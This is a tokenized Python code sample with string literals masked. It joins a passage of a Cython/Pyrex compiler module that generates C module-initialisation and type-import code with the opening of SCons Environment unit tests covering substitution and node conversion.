"<STR_LIT>" ) <EOL> code . putln ( <EOL> '<STR_LIT>' % ( <EOL> env . module_cname , <EOL> env . module_name , <EOL> env . method_table_cname , <EOL> doc ) ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> env . module_cname , <EOL> Naming . pymoduledef_cname ) ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> env . module_cname , <EOL> code . error_goto ( self . pos ) ) ) ; <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> env . module_cname ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> '<STR_LIT>' % <EOL> Naming . builtins_cname ) <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> Naming . builtins_cname , <EOL> code . error_goto ( self . pos ) ) ) ; <EOL> code . putln ( <EOL> '<STR_LIT>' % ( <EOL> env . module_cname , <EOL> Naming . builtins_cname , <EOL> code . error_goto ( self . pos ) ) ) <EOL> if Options . pre_import is not None : <EOL> code . putln ( <EOL> '<STR_LIT>' % ( <EOL> Naming . preimport_cname , <EOL> Options . pre_import ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> Naming . preimport_cname , <EOL> code . error_goto ( self . pos ) ) ) ; <EOL> def generate_global_init_code ( self , env , code ) : <EOL> for entry in env . var_entries : <EOL> if entry . visibility != '<STR_LIT>' : <EOL> if entry . type . is_pyobject and entry . used : <EOL> code . put_init_var_to_py_none ( entry ) <EOL> def generate_c_function_export_code ( self , env , code ) : <EOL> for entry in env . cfunc_entries : <EOL> if entry . api or entry . defined_in_pxd : <EOL> env . use_utility_code ( function_export_utility_code ) <EOL> signature = entry . type . signature_string ( ) <EOL> code . putln ( '<STR_LIT>' % ( <EOL> entry . name , <EOL> entry . cname , <EOL> signature , <EOL> code . error_goto ( self . pos ) ) ) <EOL> def generate_type_import_code_for_module ( self , module , env , code ) : <EOL> for entry in module . c_class_entries : <EOL> if entry . defined_in_pxd : <EOL> self . generate_type_import_code ( env , entry . type , entry . pos , code ) <EOL> def generate_c_function_import_code_for_module ( self , module , env , code ) : <EOL> entries = [ ] <EOL> for entry in module . cfunc_entries : <EOL> if entry . defined_in_pxd : <EOL> entries . append ( entry ) <EOL> if entries : <EOL> env . use_utility_code ( import_module_utility_code ) <EOL> env . use_utility_code ( function_import_utility_code ) <EOL> temp = self . module_temp_cname <EOL> code . putln ( <EOL> '<STR_LIT>' % ( <EOL> temp , <EOL> module . qualified_name , <EOL> temp , <EOL> code . error_goto ( self . pos ) ) ) <EOL> for entry in entries : <EOL> code . putln ( <EOL> '<STR_LIT>' % ( <EOL> temp , <EOL> entry . name , <EOL> entry . cname , <EOL> entry . type . signature_string ( ) , <EOL> code . error_goto ( self . pos ) ) ) <EOL> code . putln ( "<STR_LIT>" % ( temp , temp ) ) <EOL> def generate_type_init_code ( self , env , code ) : <EOL> for entry in env . c_class_entries : <EOL> if entry . visibility == '<STR_LIT>' : <EOL> self . generate_type_import_code ( env , entry . type , entry . pos , code ) <EOL> else : <EOL> self . generate_base_type_import_code ( env , entry , code ) <EOL> self . generate_exttype_vtable_init_code ( entry , code ) <EOL> self . generate_type_ready_code ( env , entry , code ) <EOL> self . generate_typeptr_assignment_code ( entry , code ) <EOL> def generate_base_type_import_code ( self , env , entry , code ) : <EOL> base_type = entry . type . base_type <EOL> if base_type and base_type . module_name != env . qualified_name : <EOL> self . generate_type_import_code ( env , base_type , self . pos , code ) <EOL> def use_type_import_utility_code ( self , env ) : <EOL> env . use_utility_code ( type_import_utility_code ) <EOL> env . use_utility_code ( import_module_utility_code ) <EOL> def generate_type_import_code ( self , env , type , pos , code ) : <EOL> if type in env . types_imported : <EOL> return <EOL> if type . typedef_flag : <EOL> objstruct = type . objstruct_cname <EOL> else : <EOL> objstruct = "<STR_LIT>" % type . objstruct_cname <EOL> self . generate_type_import_call ( type , code , <EOL> code . error_goto_if_null ( type . typeptr_cname , pos ) ) <EOL> self . use_type_import_utility_code ( env ) <EOL> if type . vtabptr_cname : <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> type . typeptr_cname , <EOL> type . vtabptr_cname , <EOL> code . error_goto ( pos ) ) ) <EOL> env . use_utility_code ( Nodes . get_vtable_utility_code ) <EOL> env . types_imported [ type ] = <NUM_LIT:1> <EOL> py3_type_name_map = { '<STR_LIT:str>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:str>' } <EOL> def generate_type_import_call ( self , type , code , error_code ) : <EOL> if type . typedef_flag : <EOL> objstruct = type . objstruct_cname <EOL> else : <EOL> objstruct = "<STR_LIT>" % type . objstruct_cname <EOL> module_name = type . module_name <EOL> if module_name not in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> module_name = '<STR_LIT>' % module_name <EOL> else : <EOL> module_name = '<STR_LIT>' <EOL> if type . name in self . py3_type_name_map : <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( '<STR_LIT>' % ( <EOL> type . typeptr_cname , <EOL> module_name , <EOL> self . py3_type_name_map [ type . name ] , <EOL> objstruct , <EOL> error_code ) ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( '<STR_LIT>' % ( <EOL> type . typeptr_cname , <EOL> module_name , <EOL> type . name , <EOL> objstruct , <EOL> error_code ) ) <EOL> if type . name in self . py3_type_name_map : <EOL> code . putln ( "<STR_LIT>" ) <EOL> def generate_type_ready_code ( self , env , entry , code ) : <EOL> type = entry . type <EOL> typeobj_cname = type . typeobj_cname <EOL> scope = type . scope <EOL> if scope : <EOL> if entry . visibility != '<STR_LIT>' : <EOL> for slot in TypeSlots . slot_table : <EOL> slot . generate_dynamic_init_code ( scope , code ) <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> typeobj_cname , <EOL> code . error_goto ( entry . pos ) ) ) <EOL> if type . vtable_cname : <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> typeobj_cname , <EOL> type . vtabptr_cname , <EOL> code . error_goto ( entry . pos ) ) ) <EOL> env . use_utility_code ( Nodes . set_vtable_utility_code ) <EOL> code . putln ( <EOL> '<STR_LIT>' % ( <EOL> Naming . module_cname , <EOL> scope . class_name , <EOL> typeobj_cname , <EOL> code . error_goto ( entry . pos ) ) ) <EOL> weakref_entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> if weakref_entry : <EOL> if weakref_entry . type is py_object_type : <EOL> tp_weaklistoffset = "<STR_LIT>" % typeobj_cname <EOL> code . putln ( "<STR_LIT>" % ( <EOL> tp_weaklistoffset , <EOL> tp_weaklistoffset , <EOL> type . objstruct_cname , <EOL> weakref_entry . cname ) ) <EOL> else : <EOL> error ( weakref_entry . pos , "<STR_LIT>" ) <EOL> def generate_exttype_vtable_init_code ( self , entry , code ) : <EOL> type = entry . type <EOL> if type . vtable_cname : <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> type . vtabptr_cname , <EOL> type . vtable_cname ) ) <EOL> if type . base_type and type . base_type . vtabptr_cname : <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> type . vtable_cname , <EOL> Naming . obj_base_cname , <EOL> type . base_type . vtabptr_cname ) ) <EOL> for meth_entry in type . scope . cfunc_entries : <EOL> if meth_entry . func_cname : <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> type . vtable_cname , <EOL> meth_entry . cname , <EOL> meth_entry . func_cname ) ) <EOL> def generate_typeptr_assignment_code ( self , entry , code ) : <EOL> type = entry . type <EOL> if type . typeobj_cname : <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> type . typeptr_cname , type . typeobj_cname ) ) <EOL> def generate_utility_functions ( self , env , code , h_code ) : <EOL> for codetup , name in env . utility_code_list : <EOL> code . globalstate . use_utility_code ( codetup , name ) <EOL> code . globalstate . put_utility_code_protos ( h_code ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % Naming . fileinit_cname ) <EOL> code . putln ( "<STR_LIT>" % <EOL> ( Naming . filetable_cname , Naming . filenames_cname ) ) <EOL> code . putln ( "<STR_LIT:}>" ) <EOL> code . globalstate . put_utility_code_defs ( code ) <EOL> code . put ( PyrexTypes . type_conversion_functions ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> builtin_module_name_utility_code = UtilityCode ( <EOL> proto = """<STR_LIT>""" ) <EOL> import_module_utility_code = UtilityCode ( <EOL> proto = """<STR_LIT>""" , <EOL> impl = """<STR_LIT>""" ) <EOL> type_import_utility_code = UtilityCode ( <EOL> proto = """<STR_LIT>""" , <EOL> impl = """<STR_LIT>""" ) <EOL> function_export_utility_code = UtilityCode ( <EOL> proto = """<STR_LIT>""" , <EOL> impl = r"""<STR_LIT>""" % { '<STR_LIT>' : Naming . module_cname , '<STR_LIT>' : Naming . api_name } <EOL> ) <EOL> function_import_utility_code = UtilityCode ( <EOL> proto = """<STR_LIT>""" , <EOL> impl = """<STR_LIT>""" % dict ( API = Naming . api_name ) <EOL> ) <EOL> register_cleanup_utility_code = UtilityCode ( <EOL> proto = """<STR_LIT>""" , <EOL> impl = """<STR_LIT>""" ) <EOL> import_star_utility_code = """<STR_LIT>""" % { '<STR_LIT>' : Naming . import_star , <EOL> '<STR_LIT>' : Naming . import_star_set } </s>
<s> __revision__ = "<STR_LIT>" <EOL> import copy <EOL> import os <EOL> import string <EOL> import StringIO <EOL> import sys <EOL> import TestCmd <EOL> import unittest <EOL> import UserList <EOL> from SCons . Environment import * <EOL> import SCons . Warnings <EOL> def diff_env ( env1 , env2 ) : <EOL> s1 = "<STR_LIT>" <EOL> s2 = "<STR_LIT>" <EOL> d = { } <EOL> for k in env1 . _dict . keys ( ) + env2 . _dict . keys ( ) : <EOL> d [ k ] = None <EOL> keys = d . keys ( ) <EOL> keys . sort ( ) <EOL> for k in keys : <EOL> if env1 . has_key ( k ) : <EOL> if env2 . has_key ( k ) : <EOL> if env1 [ k ] != env2 [ k ] : <EOL> s1 = s1 + "<STR_LIT:U+0020>" + repr ( k ) + "<STR_LIT>" + repr ( env1 [ k ] ) + "<STR_LIT:\n>" <EOL> s2 = s2 + "<STR_LIT:U+0020>" + repr ( k ) + "<STR_LIT>" + repr ( env2 [ k ] ) + "<STR_LIT:\n>" <EOL> else : <EOL> s1 = s1 + "<STR_LIT:U+0020>" + repr ( k ) + "<STR_LIT>" + repr ( env1 [ k ] ) + "<STR_LIT:\n>" <EOL> elif env2 . has_key ( k ) : <EOL> s2 = s2 + "<STR_LIT:U+0020>" + repr ( k ) + "<STR_LIT>" + repr ( env2 [ k ] ) + "<STR_LIT:\n>" <EOL> s1 = s1 + "<STR_LIT>" <EOL> s2 = s2 + "<STR_LIT>" <EOL> return s1 + s2 <EOL> def diff_dict ( d1 , d2 ) : <EOL> s1 = "<STR_LIT>" <EOL> s2 = "<STR_LIT>" <EOL> d = { } <EOL> for k in d1 . keys ( ) + d2 . keys ( ) : <EOL> d [ k ] = None <EOL> keys = d . keys ( ) <EOL> keys . sort ( ) <EOL> for k in keys : <EOL> if d1 . has_key ( k ) : <EOL> if d2 . has_key ( k ) : <EOL> if d1 [ k ] != d2 [ k ] : <EOL> s1 = s1 + "<STR_LIT:U+0020>" + repr ( k ) + "<STR_LIT>" + repr ( d1 [ k ] ) + "<STR_LIT:\n>" <EOL> s2 = s2 + "<STR_LIT:U+0020>" + repr ( k ) + "<STR_LIT>" + repr ( d2 [ k ] ) + "<STR_LIT:\n>" <EOL> else : <EOL> s1 = s1 + "<STR_LIT:U+0020>" + repr ( k ) + "<STR_LIT>" + repr ( d1 [ k ] ) + "<STR_LIT:\n>" <EOL> elif env2 . has_key ( k ) : <EOL> s2 = s2 + "<STR_LIT:U+0020>" + repr ( k ) + "<STR_LIT>" + repr ( d2 [ k ] ) + "<STR_LIT:\n>" <EOL> s1 = s1 + "<STR_LIT>" <EOL> s2 = s2 + "<STR_LIT>" <EOL> return s1 + s2 <EOL> called_it = { } <EOL> built_it = { } <EOL> class Builder : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = None ) : <EOL> self . name = name <EOL> def __call__ ( self , env , target = None , source = None , ** kw ) : <EOL> global called_it <EOL> called_it [ '<STR_LIT:target>' ] = target <EOL> called_it [ '<STR_LIT:source>' ] = source <EOL> called_it . update ( kw ) <EOL> def execute ( self , target = None , ** kw ) : <EOL> global built_it <EOL> built_it [ target ] = <NUM_LIT:1> <EOL> scanned_it = { } <EOL> class Scanner : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , skeys = [ ] ) : <EOL> self . name = name <EOL> self . skeys = skeys <EOL> def __call__ ( self , filename ) : <EOL> global scanned_it <EOL> scanned_it [ filename ] = <NUM_LIT:1> <EOL> def __cmp__ ( self , other ) : <EOL> try : <EOL> return cmp ( self . __dict__ , other . __dict__ ) <EOL> except AttributeError : <EOL> return <NUM_LIT:1> <EOL> def get_skeys ( self , env ) : <EOL> return self . skeys <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> class CLVar ( UserList . UserList ) : <EOL> def __init__ ( self , seq ) : <EOL> if type ( seq ) == type ( '<STR_LIT>' ) : <EOL> seq = string . split ( seq ) <EOL> UserList . UserList . __init__ ( self , seq ) <EOL> def __add__ ( self , other ) : <EOL> return UserList . UserList . __add__ ( self , CLVar ( other ) ) <EOL> def __radd__ ( self , other ) : <EOL> return UserList . UserList . __radd__ ( self , CLVar ( other ) ) <EOL> def __coerce__ ( self , other ) : <EOL> return ( self , CLVar ( other ) ) <EOL> class DummyNode : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> def rfile ( self ) : <EOL> return self <EOL> def get_subst_proxy ( self ) : <EOL> return self <EOL> def test_tool ( env ) : <EOL> env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> class TestEnvironmentFixture : <EOL> def TestEnvironment ( self , * args , ** kw ) : <EOL> if not kw or not kw . has_key ( '<STR_LIT>' ) : <EOL> kw [ '<STR_LIT>' ] = [ test_tool ] <EOL> default_keys = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> for key , value in default_keys . items ( ) : <EOL> if not kw . has_key ( key ) : <EOL> kw [ key ] = value <EOL> if not kw . has_key ( '<STR_LIT>' ) : <EOL> static_obj = SCons . Builder . Builder ( action = { } , <EOL> emitter = { } , <EOL> suffix = '<STR_LIT>' , <EOL> single_source = <NUM_LIT:1> ) <EOL> kw [ '<STR_LIT>' ] = { '<STR_LIT>' : static_obj } <EOL> static_obj . add_action ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> env = apply ( Environment , args , kw ) <EOL> return env <EOL> class SubstitutionTestCase ( unittest . TestCase ) : <EOL> def test___init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( ) <EOL> assert not env . has_key ( '<STR_LIT>' ) <EOL> def test___cmp__ ( self ) : <EOL> """<STR_LIT>""" <EOL> env1 = SubstitutionEnvironment ( XXX = '<STR_LIT:x>' ) <EOL> env2 = SubstitutionEnvironment ( XXX = '<STR_LIT:x>' ) <EOL> env3 = SubstitutionEnvironment ( XXX = '<STR_LIT>' ) <EOL> env4 = SubstitutionEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:x>' ) <EOL> assert env1 == env2 <EOL> assert env1 != env3 <EOL> assert env1 != env4 <EOL> def test___delitem__ ( self ) : <EOL> """<STR_LIT>""" <EOL> env1 = SubstitutionEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> env2 = SubstitutionEnvironment ( XXX = '<STR_LIT:x>' ) <EOL> del env1 [ '<STR_LIT>' ] <EOL> assert env1 == env2 <EOL> def test___getitem__ ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( XXX = '<STR_LIT:x>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> def test___setitem__ ( self ) : <EOL> """<STR_LIT>""" <EOL> env1 = SubstitutionEnvironment ( XXX = '<STR_LIT:x>' ) <EOL> env2 = SubstitutionEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> env1 [ '<STR_LIT>' ] = '<STR_LIT:y>' <EOL> assert env1 == env2 <EOL> def test_get ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( XXX = '<STR_LIT:x>' ) <EOL> assert env . get ( '<STR_LIT>' ) == '<STR_LIT:x>' , env . get ( '<STR_LIT>' ) <EOL> assert env . get ( '<STR_LIT>' ) is None , env . get ( '<STR_LIT>' ) <EOL> def test_has_key ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( XXX = '<STR_LIT:x>' ) <EOL> assert env . has_key ( '<STR_LIT>' ) <EOL> assert not env . has_key ( '<STR_LIT>' ) <EOL> def test_contains ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> '<STR_LIT:x>' in { '<STR_LIT:x>' : <NUM_LIT:1> } <EOL> except TypeError : <EOL> pass <EOL> else : <EOL> env = SubstitutionEnvironment ( XXX = '<STR_LIT:x>' ) <EOL> assert '<STR_LIT>' in env <EOL> assert not '<STR_LIT>' in env <EOL> def test_items ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> items = env . items ( ) <EOL> assert items == [ ( '<STR_LIT>' , '<STR_LIT:x>' ) , ( '<STR_LIT>' , '<STR_LIT:y>' ) ] , items <EOL> def test_arg2nodes ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( ) <EOL> dict = { } <EOL> class X ( SCons . Node . Node ) : <EOL> pass <EOL> def Factory ( name , directory = None , create = <NUM_LIT:1> , dict = dict , X = X ) : <EOL> if not dict . has_key ( name ) : <EOL> dict [ name ] = X ( ) <EOL> dict [ name ] . name = name <EOL> return dict [ name ] <EOL> nodes = env . arg2nodes ( "<STR_LIT>" , Factory ) <EOL> assert len ( nodes ) == <NUM_LIT:1> , nodes <EOL> assert isinstance ( nodes [ <NUM_LIT:0> ] , X ) <EOL> assert nodes [ <NUM_LIT:0> ] . name == "<STR_LIT>" <EOL> import types <EOL> if hasattr ( types , '<STR_LIT>' ) : <EOL> code = """<STR_LIT>""" <EOL> exec code in globals ( ) , locals ( ) <EOL> nodes = env . arg2nodes ( [ "<STR_LIT>" , "<STR_LIT>" ] , Factory ) <EOL> assert len ( nodes ) == <NUM_LIT:2> , nodes <EOL> assert isinstance ( nodes [ <NUM_LIT:0> ] , X ) <EOL> assert isinstance ( nodes [ <NUM_LIT:1> ] , X ) <EOL> assert nodes [ <NUM_LIT:0> ] . name == "<STR_LIT>" <EOL> assert nodes [ <NUM_LIT:1> ] . name == "<STR_LIT>" <EOL> n1 = Factory ( "<STR_LIT>" ) <EOL> nodes = env . arg2nodes ( [ n1 , "<STR_LIT>" ] , Factory ) <EOL> assert len ( nodes ) == <NUM_LIT:2> , nodes <EOL> assert isinstance ( nodes [ <NUM_LIT:0> ] , X ) <EOL> assert isinstance ( nodes [ <NUM_LIT:1> ] , X ) <EOL> assert nodes [ <NUM_LIT:0> ] . name == "<STR_LIT>" <EOL> assert nodes [ <NUM_LIT:1> ] . name == "<STR_LIT>" <EOL> class SConsNode ( SCons . Node . Node ) : <EOL> pass <EOL> nodes = env . arg2nodes ( SConsNode ( ) ) <EOL> assert len ( nodes ) == <NUM_LIT:1> , nodes <EOL> assert isinstance ( nodes [ <NUM_LIT:0> ] , SConsNode ) , node <EOL> class OtherNode : <EOL> pass <EOL> nodes = env . arg2nodes ( OtherNode ( ) ) <EOL> assert len ( nodes ) == <NUM_LIT:1> , nodes <EOL> assert isinstance ( nodes [ <NUM_LIT:0> ] , OtherNode ) , node <EOL> def lookup_a ( str , F = Factory ) : <EOL> if str [ <NUM_LIT:0> ] == '<STR_LIT:a>' : <EOL> n = F ( str ) <EOL> n . a = <NUM_LIT:1> <EOL> return n <EOL> else : <EOL> return None <EOL> def lookup_b ( str , F = Factory ) : <EOL> if str [ <NUM_LIT:0> ] == '<STR_LIT:b>' : <EOL> n = F ( str ) <EOL> n . b = <NUM_LIT:1> <EOL> return n <EOL> else : <EOL> return None <EOL> env_ll = SubstitutionEnvironment ( ) <EOL> env_ll . lookup_list = [ lookup_a , lookup_b ] <EOL> nodes = env_ll . arg2nodes ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , Factory ) <EOL> assert len ( nodes ) == <NUM_LIT:3> , nodes <EOL> assert nodes [ <NUM_LIT:0> ] . name == '<STR_LIT>' , nodes [ <NUM_LIT:0> ] <EOL> assert nodes [ <NUM_LIT:0> ] . a == <NUM_LIT:1> , nodes [ <NUM_LIT:0> ] <EOL> assert not hasattr ( nodes [ <NUM_LIT:0> ] , '<STR_LIT:b>' ) , nodes [ <NUM_LIT:0> ] <EOL> assert nodes [ <NUM_LIT:1> ] . name == '<STR_LIT>' <EOL> assert not hasattr ( nodes [ <NUM_LIT:1> ] , '<STR_LIT:a>' ) , nodes [ <NUM_LIT:1> ] <EOL> assert nodes [ <NUM_LIT:1> ] . b == <NUM_LIT:1> , nodes [ <NUM_LIT:1> ] <EOL> assert nodes [ <NUM_LIT:2> ] . name == '<STR_LIT>' <EOL> assert not hasattr ( nodes [ <NUM_LIT:2> ] , '<STR_LIT:a>' ) , nodes [ <NUM_LIT:1> ] <EOL> assert not hasattr ( nodes [ <NUM_LIT:2> ] , '<STR_LIT:b>' ) , nodes [ <NUM_LIT:1> ] <EOL> def lookup_bbbb ( str , F = Factory ) : <EOL> if str == '<STR_LIT>' : <EOL> n = F ( str ) <EOL> n . bbbb = <NUM_LIT:1> <EOL> return n <EOL> else : <EOL> return None <EOL> def lookup_c ( str , F = Factory ) : <EOL> if str [ <NUM_LIT:0> ] == '<STR_LIT:c>' : <EOL> n = F ( str ) <EOL> n . c = <NUM_LIT:1> <EOL> return n <EOL> else : <EOL> return None <EOL> nodes = env . arg2nodes ( [ '<STR_LIT>' , '<STR_LIT>' ] , Factory , <EOL> [ lookup_c , lookup_bbbb , lookup_b ] ) <EOL> assert len ( nodes ) == <NUM_LIT:2> , nodes <EOL> assert nodes [ <NUM_LIT:0> ] . name == '<STR_LIT>' <EOL> assert not hasattr ( nodes [ <NUM_LIT:0> ] , '<STR_LIT:a>' ) , nodes [ <NUM_LIT:1> ] <EOL> assert not hasattr ( nodes [ <NUM_LIT:0> ] , '<STR_LIT:b>' ) , nodes [ <NUM_LIT:1> ] <EOL> assert nodes [ <NUM_LIT:0> ] . bbbb == <NUM_LIT:1> , nodes [ <NUM_LIT:1> ] <EOL> assert not hasattr ( nodes [ <NUM_LIT:0> ] , '<STR_LIT:c>' ) , nodes [ <NUM_LIT:0> ] <EOL> assert nodes [ <NUM_LIT:1> ] . name == '<STR_LIT>' <EOL> assert not hasattr ( nodes [ <NUM_LIT:1> ] , '<STR_LIT:a>' ) , nodes [ <NUM_LIT:1> ] <EOL> assert not hasattr ( nodes [ <NUM_LIT:1> ] , '<STR_LIT:b>' ) , nodes [ <NUM_LIT:1> ] <EOL> assert not hasattr ( nodes [ <NUM_LIT:1> ] , '<STR_LIT>' ) , nodes [ <NUM_LIT:0> ] <EOL> assert nodes [ <NUM_LIT:1> ] . c == <NUM_LIT:1> , nodes [ <NUM_LIT:1> ] <EOL> def test_arg2nodes_target_source ( self ) : <EOL> """<STR_LIT>""" <EOL> targets = [ DummyNode ( '<STR_LIT>' ) , DummyNode ( '<STR_LIT>' ) ] <EOL> sources = [ DummyNode ( '<STR_LIT>' ) , DummyNode ( '<STR_LIT>' ) ] <EOL> env = SubstitutionEnvironment ( ) <EOL> nodes = env . arg2nodes ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> DummyNode , <EOL> target = targets , <EOL> source = sources ) <EOL> names = map ( lambda n : n . name , nodes ) <EOL> assert names == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , names <EOL> def test_gvars ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( ) <EOL> gvars = env . gvars ( ) <EOL> assert gvars == { } , gvars <EOL> def test_lvars ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( ) <EOL> lvars = env . lvars ( ) <EOL> assert lvars == { } , lvars <EOL> def test_subst ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( AAA = '<STR_LIT:a>' , BBB = '<STR_LIT:b>' ) <EOL> mystr = env . subst ( "<STR_LIT>" ) <EOL> assert mystr == "<STR_LIT>" , mystr <EOL> env = SubstitutionEnvironment ( AAA = '<STR_LIT>' , BBB = '<STR_LIT:b>' , BBBA = '<STR_LIT:foo>' ) <EOL> mystr = env . subst ( "<STR_LIT>" ) <EOL> assert mystr == "<STR_LIT>" , mystr <EOL> env = SubstitutionEnvironment ( AAA = '<STR_LIT>' , BBB = '<STR_LIT>' , CCC = '<STR_LIT:c>' ) <EOL> mystr = env . subst ( "<STR_LIT>" ) <EOL> assert mystr == "<STR_LIT>" , mystr <EOL> env = SubstitutionEnvironment ( AAA = [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> mystr = env . subst ( "<STR_LIT>" ) <EOL> assert mystr == "<STR_LIT>" , mystr <EOL> env = SubstitutionEnvironment ( AAA = ( '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> mystr = env . subst ( "<STR_LIT>" ) <EOL> assert mystr == "<STR_LIT>" , mystr <EOL> t1 = DummyNode ( '<STR_LIT>' ) <EOL> t2 = DummyNode ( '<STR_LIT>' ) <EOL> s1 = DummyNode ( '<STR_LIT>' ) <EOL> s2 = DummyNode ( '<STR_LIT>' ) <EOL> env = SubstitutionEnvironment ( AAA = '<STR_LIT>' ) <EOL> s = env . subst ( '<STR_LIT>' , target = [ t1 , t2 ] , source = [ s1 , s2 ] ) <EOL> assert s == "<STR_LIT>" , s <EOL> s = env . subst ( '<STR_LIT>' , target = [ t1 , t2 ] , source = [ s1 , s2 ] ) <EOL> assert s == "<STR_LIT>" , s <EOL> def foo ( target , source , env , for_signature ) : <EOL> assert str ( target ) == '<STR_LIT:t>' , target <EOL> assert str ( source ) == '<STR_LIT:s>' , source <EOL> return env [ "<STR_LIT>" ] <EOL> env = SubstitutionEnvironment ( BAR = foo , FOO = '<STR_LIT>' ) <EOL> t = DummyNode ( '<STR_LIT:t>' ) <EOL> s = DummyNode ( '<STR_LIT:s>' ) <EOL> subst = env . subst ( '<STR_LIT>' , target = t , source = s ) <EOL> assert subst == '<STR_LIT>' , subst <EOL> if <NUM_LIT:0> : <EOL> def bar ( arg ) : <EOL> pass <EOL> env = SubstitutionEnvironment ( BAR = bar , FOO = '<STR_LIT>' ) <EOL> subst = env . subst ( '<STR_LIT>' , call = None ) <EOL> assert subst is bar , subst <EOL> subst = env . subst ( '<STR_LIT>' , call = None ) <EOL> assert subst is bar , subst <EOL> def test_subst_kw ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( AAA = '<STR_LIT:a>' , BBB = '<STR_LIT:b>' ) <EOL> kw = env . subst_kw ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert len ( kw ) == <NUM_LIT:2> , kw <EOL> assert kw [ '<STR_LIT:a>' ] == '<STR_LIT>' , kw [ '<STR_LIT:a>' ] <EOL> assert kw [ '<STR_LIT>' ] == '<STR_LIT:b>' , kw [ '<STR_LIT>' ] <EOL> def test_subst_list ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( AAA = '<STR_LIT:a>' , BBB = '<STR_LIT:b>' ) <EOL> l = env . subst_list ( "<STR_LIT>" ) <EOL> assert l == [ [ "<STR_LIT:a>" , "<STR_LIT>" , "<STR_LIT:b>" ] ] , l <EOL> env = SubstitutionEnvironment ( AAA = '<STR_LIT>' , BBB = '<STR_LIT:b>' , BBBA = '<STR_LIT:foo>' ) <EOL> l = env . subst_list ( "<STR_LIT>" ) <EOL> assert l == [ [ "<STR_LIT:b>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:b>" ] ] , l <EOL> env = SubstitutionEnvironment ( AAA = '<STR_LIT>' , BBB = '<STR_LIT>' , CCC = '<STR_LIT:c>' ) <EOL> l = env . subst_list ( "<STR_LIT>" ) <EOL> assert l == [ [ "<STR_LIT:c>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:c>" ] ] , mystr <EOL> env = SubstitutionEnvironment ( AAA = '<STR_LIT>' , BBB = '<STR_LIT>' , CCC = [ '<STR_LIT:a>' , '<STR_LIT>' ] ) <EOL> lst = env . subst_list ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> assert lst == [ [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ "<STR_LIT:c>" , "<STR_LIT>" , "<STR_LIT:b>" ] , [ "<STR_LIT:c>" ] ] , lst <EOL> t1 = DummyNode ( '<STR_LIT>' ) <EOL> t2 = DummyNode ( '<STR_LIT>' ) <EOL> s1 = DummyNode ( '<STR_LIT>' ) <EOL> s2 = DummyNode ( '<STR_LIT>' ) 